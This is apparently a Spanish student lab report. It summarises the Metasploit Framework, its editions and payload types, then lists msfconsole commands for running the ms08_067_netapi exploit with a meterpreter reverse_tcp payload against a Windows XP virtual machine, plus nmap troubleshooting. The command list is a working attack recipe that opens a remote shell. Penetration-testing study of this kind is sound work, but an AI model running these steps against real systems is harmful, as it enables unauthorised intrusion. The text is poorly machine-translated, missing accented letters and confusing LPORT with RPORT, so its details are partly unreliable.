METASPLOIT

El Proyecto Metasploit es un proyecto de seguridad informtica que proporciona informacin

acerca de las vulnerabilidades de seguridad y ayuda en las pruebas de penetracin y desarrollo de
IDS firma.
Su ms conocido sub-proyecto es de cdigo abierto [2] Metasploit Framework, una herramienta
para el desarrollo y ejecucin de cdigo de explotacin en contra de un equipo de destino remoto.
Otros sub-proyectos importantes incluyen la base de datos de cdigo de operacin, archivo
shellcode e investigacin relacionada.
El Proyecto Metasploit es bien conocida por sus herramientas anti-forenses y de evasin, algunos
de los cuales se construyen en el marco de Metasploit.


Metasploit Framework
Los pasos bsicos para la explotacin de un sistema que utiliza el Marco incluyen:
o La eleccin y configuracin de un exploit (cdigo que entra en un sistema de destino
mediante el aprovechamiento de una de sus errores; unos 900 exploits diferentes para
Windows, Unix / Linux y Mac OS X sistemas estn incluidos);
o Opcionalmente comprobar si el sistema de destino previsto es susceptible a la explotar
elegido;
o La eleccin y configuracin de una carga til (cdigo que se ejecuta en el sistema de
destino despus de la entrada con xito, por ejemplo, un shell remoto o un servidor VNC);
o La eleccin de la tcnica de codificacin de modo que el sistema de prevencin de
intrusiones (IPS) ignora la carga til codificada;
La ejecucin de la hazaa.
Este enfoque modular - que permite la combinacin de cualquiera explotar con cualquier carga til
- es la principal ventaja del Marco. Facilita las tareas de los atacantes, explotar los escritores y los
escritores de la carga til.
Metasploit se ejecuta en Unix (incluyendo Linux y Mac OS X) y en Windows. El Metasploit
Framework se puede extender a utilizar complementos en varios idiomas.
Para elegir un exploit y la carga til, se necesita un poco de informacin sobre el sistema de
destino, como la versin del sistema operativo y los servicios de red instalados. Esta informacin
puede ser obtenida con el escaneo de puertos y fingerprinting OS herramientas como Nmap. Los
scanners de vulnerabilidades como Nessus NeXpose o pueden detectar las vulnerabilidades del
sistema de destino. Metasploit puede importar datos de anlisis de vulnerabilidades y comparar
las vulnerabilidades identificadas a los actuales mdulos de explotar con fines de explotacin
exacta. [8]
Metasploit Interfaces
Hay varias interfaces para Metasploit disponibles. Las ms populares son mantenidas por Rapid7 y
Estratgico Ciber LLC. [9]
Metasploit Framework Edition
La versin gratuita. Contiene una interfaz de lnea de comandos, la importacin de terceros, la
explotacin manual y bruta manual de forzar. [9]
Metasploit Community Edition
En octubre de 2011, Rapid7 lanzado Metasploit Community Edition, una interfaz de usuario
basada en web gratuito para Metasploit. Metasploit comunitaria se basa en la funcionalidad
comercial del pago para las ediciones con un conjunto reducido de caractersticas, incluyendo la
deteccin de redes, la navegacin y la explotacin del mdulo manual. Metasploit Comunidad est
incluido en el instalador principal.
Metasploit expreso
En abril de 2010, Rapid7 lanzado Metasploit Express, una edicin comercial de ncleo abierto para
los equipos de seguridad que necesitan para verificar vulnerabilidades. Ofrece una interfaz grfica
de usuario, se integra nmap para el descubrimiento, y agrega fuerza bruta inteligente, as como la
recopilacin de pruebas automatizadas.
Metasploit Pro
En octubre de 2010, Rapid7 aadi Metasploit Pro, una edicin Metasploit comercial-core abierto
para pruebas de penetracin. Metasploit Pro incluye todas las caractersticas de Metasploit
Express y aade el escaneo de aplicaciones web y la explotacin, las campaas de ingeniera social
y VPN pivotante.
Armitage
Armitage es una herramienta de gestin de ataque ciberntico grfica para el Proyecto Metasploit
que visualiza objetivos y recomienda hazaas. Es una herramienta gratuita y abierta de seguridad
de red de fuente notable por sus contribuciones a la colaboracin del equIPo rojo que permite,
sesiones compartidas, datos y comunicacin a travs de una nica instancia de Metasploit. [10]
Las cargas tiles
Metasploit ofrece muchos tipos de cargas tiles, entre ellos:
o Shell de comandos permite a los usuarios ejecutar scripts de recoleccin o ejecutar
comandos arbitrarios contra el husped.
o Meterpreter permite a los usuarios controlar la pantalla de un dispositivo a travs de VNC
y para navegar, cargar y descargar archivos.
o Cargas dinmicas permite a los usuarios para evadir las defensas anti-virus mediante la
generacin de cargas nicas.

INFORME
Prueba de lnea de comandos como ejemplo para exploit ms08_067_netapi para Windows xp
Comandos a ejecutar
1. service postsqls start
2. service metasploit start
3. msfconsole
4. use exploit/Windows/smb/ms08_067_netapi
5. show options
6. set PAYLOAD windows/meterpreter/reverse_tcp
7. set LHOST <IP local>
8. set LPORT <Puerto local de uso>
9. set RHOST <IP attack>
10. set LPORT <puerto vulnerabilidad de netapi>
11. exploit
Problemas en el proceso
o comando exploit no funciona,
o para este problema se verifico que la red de Windows estaba habilitada y Disponible
(siendo el uso de una mquina virtual existe la posibilidad de una conexin inestable a
diferencia de una maquina fsica)
Para el proceso de verificacin se us los siguientes comandos de prueba

- nmap O sS <IP de Windows>
- ping <IP de Windows>

o se puede observar que hay respuesta sin sentido de parte de Windows, para solucionarlo
se modifica la mquina virtual con 2 interfaces adicionales
o se realiza la prueba de los comandos nmap y ping con las nuevas interfaces
o as mostrando resultados , para luego realizar el exploit